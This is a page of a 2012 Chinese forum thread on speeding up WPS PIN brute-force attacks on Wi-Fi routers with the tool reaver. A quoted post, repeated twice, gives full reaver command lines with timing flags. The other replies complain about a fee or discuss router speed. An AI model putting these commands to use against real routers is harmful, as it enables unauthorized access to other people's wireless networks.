windhu 发表于 2012-6-12 10:42

加-d 0 更容易把路由pin死,pin速度和路由器有很大,如果路由器不行,pin起来也越来越慢,就算信号好也不行。

13820122400 发表于 2012-6-12 11:11

点击ctrl+C 终止保存我们PIN的进程

2012-6-10 20:28 上传下载附件 (41.51 KB)

看上图我标记的位置。

这里我们修改为

reaver –i mon0 –b MAC –a –c 1 –e “ssid” –S –vv –N –d 0

当然这是打气筒自带的参数上我添加的。平时我都是自己写参数的

如下

reaver –i mon0 –b MAC –a –S –v –N –d 0

意思其实差不多。

然后我们点击Run

2012-6-10 20:29 上传下载附件 (26.1 KB)

看上图我标记的位置。

这里我们修改为

reaver –i mon0 –b MAC –a –c 1 –e “ssid” –S –vv –N –d 0

当然这是打气筒自带的参数上我添加的。平时我都是自己写参数的

如下

reaver –i mon0 –b MAC –a –S –v –N –d 0

意思其实差不多。

然后我们点击Run

popinjay 发表于 2012-6-12 12:55

我晕,,这也要钱???

Jo_San 发表于 2012-6-12 13:33

忽悠,接着忽悠 。。。

caoshi666 发表于 2012-6-12 16:57

楼主不厚道啊!!!!这也要钱啊   同意8楼的说法   路由器速度和信号很关键

O记 发表于 2012-6-12 17:07

:)!!!!!!!!!!!

bd6ulq 发表于 2012-6-12 17:19

guyoulin 发表于 2012-6-12 17:56

pin的速度 和路由器有关系的

维科多 发表于 2012-6-12 20:24

看看也无语,我的钱啊

hao123qq 发表于 2012-6-12 21:00

路过看看:):)

hao123qq 发表于 2012-6-12 21:32

请问楼主 reaver –i mon0 –b MAC –a –c 1 –e “ssid” –S –vv –N –d 0

一样吗?具体点

xin5927 发表于 2012-6-13 01:16

呵呵 飞快了 连对的码也一闪而过咋办拉
页: 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21 22
查看完整版本: 让PIN飞起来。让PIN从8秒/PIN到2秒/pin。论坛群共享同步